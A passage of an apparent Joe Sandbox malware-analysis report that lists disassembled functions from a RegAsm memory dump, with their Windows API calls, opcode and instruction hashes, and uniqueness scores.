                                                        • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                        • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                        • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                        • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                        • GetLastError.KERNEL32 ref: 00440D35
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 1717984340-0
                                                        • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                        • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                        • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastRead
                                                        • String ID:
                                                        • API String ID: 4100373531-0
                                                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%